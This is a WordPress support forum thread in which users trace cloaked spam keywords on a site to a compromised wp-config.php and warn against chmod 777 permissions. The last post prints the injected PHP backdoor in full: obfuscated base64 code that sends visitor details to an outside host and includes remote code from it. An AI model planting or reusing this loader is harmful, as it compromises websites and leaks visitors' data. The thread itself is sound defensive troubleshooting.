WordPress.org

Ready to get started?Download WordPress

Forums

Google Cache Adding Keywords (6 posts)

  1. cpoteet
    Member
    Posted 7 years ago #

    When I view my WP site on Google's cache I see that it adds many keywords with no relevance to my site.

    Has anyone else dealt with this?

  2. theiconoclast31
    Member
    Posted 7 years ago #

    It's definitely fishy. What plugins do you have installed?

  3. whooami
    Member
    Posted 7 years ago #

    that looks very sinister. If I had to guess - Its a plugin thats adding content via the wp_head hook.

    Ive emailed you via your contact form, I would really like to go through all your plugins, if you didnt mind.

    Since google's

    cache is well.. cached.. disabling and enabling plugins isnt neccessarily going to immediately diagnose exactly what plugin is doing that.

    i found your list that says what youre using. There a few dead urls though, the actual files would help immensely

  4. whooami
    Member
    Posted 7 years ago #

    To follow up on this, for anyone interested:

    I have gone through the zip of plugins off this site, and grepped for every possible javascript escape, urlencode, and the like that might be causing this.

    While I didnt find anything in the plugins, just looking at the source of the front page indicated to me there was some sort of content above <!-- Header Start -->.

    Seeing that, I spoofed my useragent as googlebot, and voila, the added spam content is there for me to see.

    I've explained to Chris, the site op, that he needs to take a look at his theme files, specifically header.php for anything that looks unusual. If he doesnt find anything, atleast with the spoofed ua it will be easier to determine if, in fact, it is a plugin.

  5. whooami
    Member
    Posted 7 years ago #

  6. whooami
    Member
    Posted 7 years ago #

    alrighty then..

    Chris and I went through his files. He disabled all his plugins. Didnt change. He changed themes. Still there.

    Common sense told me that it had to be somewhere within a core WP file.

    And so it was:

    Within wp-config.php was one line that didnt fit in:

    error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

    You can google that string if your especially curious about what it does but here's a pretty good explanation:

    http://forums.asmallorange.com/lofiversion/index.php/t5815.html

    Chris' wp-config.php was chmod 777.

    The moral of this story: 777 is evil, repeat after me. 777 is evil. 777 is evil. Your .htaccess doesnt need it. Your wp-config.php doesnt need it. Your theme files dont need it.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags